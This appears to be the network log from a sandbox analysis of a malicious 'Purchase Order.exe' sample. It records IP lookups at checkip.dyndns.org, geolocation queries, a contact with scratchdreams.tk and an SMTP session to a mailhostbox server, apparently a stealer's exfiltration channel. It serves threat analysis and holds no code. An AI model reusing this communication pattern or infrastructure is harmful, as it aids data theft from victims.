Apr 4, 2024 12:56:22.476294994 CEST	80	49718	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:22.476450920 CEST	49718	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:22.477092028 CEST	80	49720	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:22.477200985 CEST	49720	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:22.477426052 CEST	49720	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:22.631289959 CEST	80	49720	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:22.631767988 CEST	80	49720	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:22.672539949 CEST	49720	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:22.730434895 CEST	49721	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:22.730474949 CEST	443	49721	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:22.730606079 CEST	49721	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:22.730981112 CEST	49721	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:22.730994940 CEST	443	49721	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:22.988173962 CEST	443	49721	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:22.990212917 CEST	49721	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:22.990246058 CEST	443	49721	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:23.285244942 CEST	443	49721	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:23.285393953 CEST	443	49721	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:23.285618067 CEST	49721	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:24.046724081 CEST	49721	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:24.089521885 CEST	49720	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:24.090101004 CEST	49722	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:24.243560076 CEST	80	49720	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:24.243585110 CEST	80	49722	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:24.243638039 CEST	49720	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:24.243681908 CEST	49722	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:24.248111010 CEST	49722	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:24.402348995 CEST	80	49722	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:24.403249025 CEST	80	49722	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:24.404405117 CEST	49723	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:24.404432058 CEST	443	49723	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:24.404520035 CEST	49723	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:24.404743910 CEST	49723	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:24.404758930 CEST	443	49723	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:24.453768969 CEST	49722	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:24.663688898 CEST	443	49723	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:24.665607929 CEST	49723	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:24.665637970 CEST	443	49723	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:24.963432074 CEST	443	49723	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:24.963546038 CEST	443	49723	172.67.177.134	192.168.2.5
Apr 4, 2024 12:56:24.963602066 CEST	49723	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:24.964008093 CEST	49723	443	192.168.2.5	172.67.177.134
Apr 4, 2024 12:56:24.978809118 CEST	49722	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:25.132348061 CEST	80	49722	193.122.130.0	192.168.2.5
Apr 4, 2024 12:56:25.132463932 CEST	49722	80	192.168.2.5	193.122.130.0
Apr 4, 2024 12:56:25.362708092 CEST	49724	443	192.168.2.5	104.21.27.85
Apr 4, 2024 12:56:25.362752914 CEST	443	49724	104.21.27.85	192.168.2.5
Apr 4, 2024 12:56:25.362824917 CEST	49724	443	192.168.2.5	104.21.27.85
Apr 4, 2024 12:56:25.363360882 CEST	49724	443	192.168.2.5	104.21.27.85
Apr 4, 2024 12:56:25.363370895 CEST	443	49724	104.21.27.85	192.168.2.5
Apr 4, 2024 12:56:25.625180960 CEST	443	49724	104.21.27.85	192.168.2.5
Apr 4, 2024 12:56:25.625426054 CEST	49724	443	192.168.2.5	104.21.27.85
Apr 4, 2024 12:56:25.627024889 CEST	49724	443	192.168.2.5	104.21.27.85
Apr 4, 2024 12:56:25.627047062 CEST	443	49724	104.21.27.85	192.168.2.5
Apr 4, 2024 12:56:25.627327919 CEST	443	49724	104.21.27.85	192.168.2.5
Apr 4, 2024 12:56:25.628824949 CEST	49724	443	192.168.2.5	104.21.27.85
Apr 4, 2024 12:56:25.672236919 CEST	443	49724	104.21.27.85	192.168.2.5
Apr 4, 2024 12:56:57.138442039 CEST	443	49724	104.21.27.85	192.168.2.5
Apr 4, 2024 12:56:57.138510942 CEST	443	49724	104.21.27.85	192.168.2.5
Apr 4, 2024 12:56:57.138784885 CEST	49724	443	192.168.2.5	104.21.27.85
Apr 4, 2024 12:56:57.143800974 CEST	49724	443	192.168.2.5	104.21.27.85
Apr 4, 2024 12:57:02.547230959 CEST	49733	587	192.168.2.5	208.91.199.224
Apr 4, 2024 12:57:02.743268013 CEST	587	49733	208.91.199.224	192.168.2.5
Apr 4, 2024 12:57:02.743391037 CEST	49733	587	192.168.2.5	208.91.199.224
Apr 4, 2024 12:57:03.099890947 CEST	587	49733	208.91.199.224	192.168.2.5
Apr 4, 2024 12:57:03.100392103 CEST	49733	587	192.168.2.5	208.91.199.224
Apr 4, 2024 12:57:03.296541929 CEST	587	49733	208.91.199.224	192.168.2.5
Apr 4, 2024 12:57:03.296686888 CEST	587	49733	208.91.199.224	192.168.2.5
Apr 4, 2024 12:57:03.297786951 CEST	49733	587	192.168.2.5	208.91.199.224
Apr 4, 2024 12:57:03.497982025 CEST	587	49733	208.91.199.224	192.168.2.5
Apr 4, 2024 12:57:03.498286009 CEST	49733	587	192.168.2.5	208.91.199.224
Apr 4, 2024 12:57:03.701186895 CEST	587	49733	208.91.199.224	192.168.2.5
Apr 4, 2024 12:57:03.701442003 CEST	49733	587	192.168.2.5	208.91.199.224
Apr 4, 2024 12:57:03.899720907 CEST	587	49733	208.91.199.224	192.168.2.5
Apr 4, 2024 12:57:03.900135040 CEST	49733	587	192.168.2.5	208.91.199.224
Apr 4, 2024 12:57:04.112376928 CEST	587	49733	208.91.199.224	192.168.2.5
Apr 4, 2024 12:57:04.115236044 CEST	49733	587	192.168.2.5	208.91.199.224
Apr 4, 2024 12:57:04.312741995 CEST	587	49733	208.91.199.224	192.168.2.5
Apr 4, 2024 12:57:04.312810898 CEST	49733	587	192.168.2.5	208.91.199.224
Apr 4, 2024 12:57:24.046622038 CEST	80	49712	193.122.130.0	192.168.2.5
Apr 4, 2024 12:57:24.046751976 CEST	49712	80	192.168.2.5	193.122.130.0

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 4, 2024 12:56:13.683469057 CEST	50750	53	192.168.2.5	1.1.1.1
Apr 4, 2024 12:56:13.807715893 CEST	53	50750	1.1.1.1	192.168.2.5
Apr 4, 2024 12:56:17.319058895 CEST	63248	53	192.168.2.5	1.1.1.1
Apr 4, 2024 12:56:17.443893909 CEST	53	63248	1.1.1.1	192.168.2.5
Apr 4, 2024 12:56:24.979290962 CEST	56740	53	192.168.2.5	1.1.1.1
Apr 4, 2024 12:56:25.361931086 CEST	53	56740	1.1.1.1	192.168.2.5
Apr 4, 2024 12:57:02.416501045 CEST	59794	53	192.168.2.5	1.1.1.1
Apr 4, 2024 12:57:02.546221972 CEST	53	59794	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 4, 2024 12:56:13.683469057 CEST	192.168.2.5	1.1.1.1	0xc598	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Apr 4, 2024 12:56:17.319058895 CEST	192.168.2.5	1.1.1.1	0xcdd8	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Apr 4, 2024 12:56:24.979290962 CEST	192.168.2.5	1.1.1.1	0xc6dd	Standard query (0)	scratchdreams.tk	A (IP address)	IN (0x0001)	false
Apr 4, 2024 12:57:02.416501045 CEST	192.168.2.5	1.1.1.1	0x86f0	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 4, 2024 12:56:13.807715893 CEST	1.1.1.1	192.168.2.5	0xc598	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 4, 2024 12:56:13.807715893 CEST	1.1.1.1	192.168.2.5	0xc598	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Apr 4, 2024 12:56:13.807715893 CEST	1.1.1.1	192.168.2.5	0xc598	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Apr 4, 2024 12:56:13.807715893 CEST	1.1.1.1	192.168.2.5	0xc598	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Apr 4, 2024 12:56:13.807715893 CEST	1.1.1.1	192.168.2.5	0xc598	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Apr 4, 2024 12:56:13.807715893 CEST	1.1.1.1	192.168.2.5	0xc598	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Apr 4, 2024 12:56:17.443893909 CEST	1.1.1.1	192.168.2.5	0xcdd8	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Apr 4, 2024 12:56:17.443893909 CEST	1.1.1.1	192.168.2.5	0xcdd8	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Apr 4, 2024 12:56:25.361931086 CEST	1.1.1.1	192.168.2.5	0xc6dd	No error (0)	scratchdreams.tk		104.21.27.85	A (IP address)	IN (0x0001)	false
Apr 4, 2024 12:56:25.361931086 CEST	1.1.1.1	192.168.2.5	0xc6dd	No error (0)	scratchdreams.tk		172.67.169.18	A (IP address)	IN (0x0001)	false
Apr 4, 2024 12:57:02.546221972 CEST	1.1.1.1	192.168.2.5	0x86f0	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)	false
Apr 4, 2024 12:57:02.546221972 CEST	1.1.1.1	192.168.2.5	0x86f0	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)	false
Apr 4, 2024 12:57:02.546221972 CEST	1.1.1.1	192.168.2.5	0x86f0	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)	false
Apr 4, 2024 12:57:02.546221972 CEST	1.1.1.1	192.168.2.5	0x86f0	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

scratchdreams.tk

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49709	193.122.130.0	80	6336	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 12:56:13.971292019 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 4, 2024 12:56:15.125416994 CEST	276	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 10:56:15 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
Apr 4, 2024 12:56:15.130779982 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 4, 2024 12:56:17.284769058 CEST	276	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 10:56:17 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>
Apr 4, 2024 12:56:18.014492035 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 4, 2024 12:56:18.169435978 CEST	276	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 10:56:18 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49712	193.122.130.0	80	6336	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 12:56:18.892283916 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 4, 2024 12:56:19.046482086 CEST	276	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 10:56:18 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49714	193.122.130.0	80	6336	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 12:56:19.766798019 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 4, 2024 12:56:20.001530886 CEST	276	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 10:56:19 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49716	193.122.130.0	80	6336	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 12:56:20.716679096 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 4, 2024 12:56:20.873720884 CEST	276	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 10:56:20 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49718	193.122.130.0	80	6336	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 12:56:21.601238966 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 4, 2024 12:56:21.755465984 CEST	276	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 10:56:21 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49720	193.122.130.0	80	6336	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 12:56:22.477426052 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 4, 2024 12:56:22.631767988 CEST	276	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 10:56:22 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49722	193.122.130.0	80	6336	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 12:56:24.248111010 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 4, 2024 12:56:24.403249025 CEST	276	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 10:56:24 GMT Content-Type: text/html Content-Length: 107 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49710	172.67.177.134	443	6336	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 10:56:17 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-04 10:56:18 UTC	708	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 10:56:17 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 78758 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qyHtZ4j9vJ0OZDxWO8yvEl9n%2B2Ajr1dqkK2bTXMrsa5ZlJC0M4hoOS0ossPb51YoRQAkiZCPN6cxBWb1vsfTFaIu%2Fc1Hgae7ygb8z1Vya%2BRgXbOS7lzbSrhNzRESz%2FnUIjD7ywB5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f0c560193da4ca-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 10:56:18 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-04 10:56:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49711	172.67.177.134	443	6336	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 10:56:18 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-04 10:56:18 UTC	702	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 10:56:18 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 78759 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WSoGlwmqdLA9a3XYWIVK85tpwtRaGRdMmM3pRuufD64TreiIA3v4gC3oWDWEmjC2VapirVDQcKUcSYZqKRMRU7rV00qWXLQTTsgTinBGHD3Bc8y3mltPHSlhvgZWGa%2F7s0UvsrTe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f0c5649ce831e3-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 10:56:18 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-04 10:56:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49713	172.67.177.134	443	6336	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 10:56:19 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-04 10:56:19 UTC	716	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 10:56:19 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 78760 Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dObVvzhjmsy4q22Je%2BzH%2FvS8K4ueHXN6Pho%2F3CoDp4m%2Bg7cozI4XSrt24Pei79lQl6sJ7RXSFOR6%2BgVm9ExMLpnvoNB0Tli10%2Buj6mTNtcecUo%2BVbYcazJ3RUxSZu0OI%2FFzfxJKT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f0c56a1f5b21eb-MIA alt-svc: h3=":443"; ma=86400
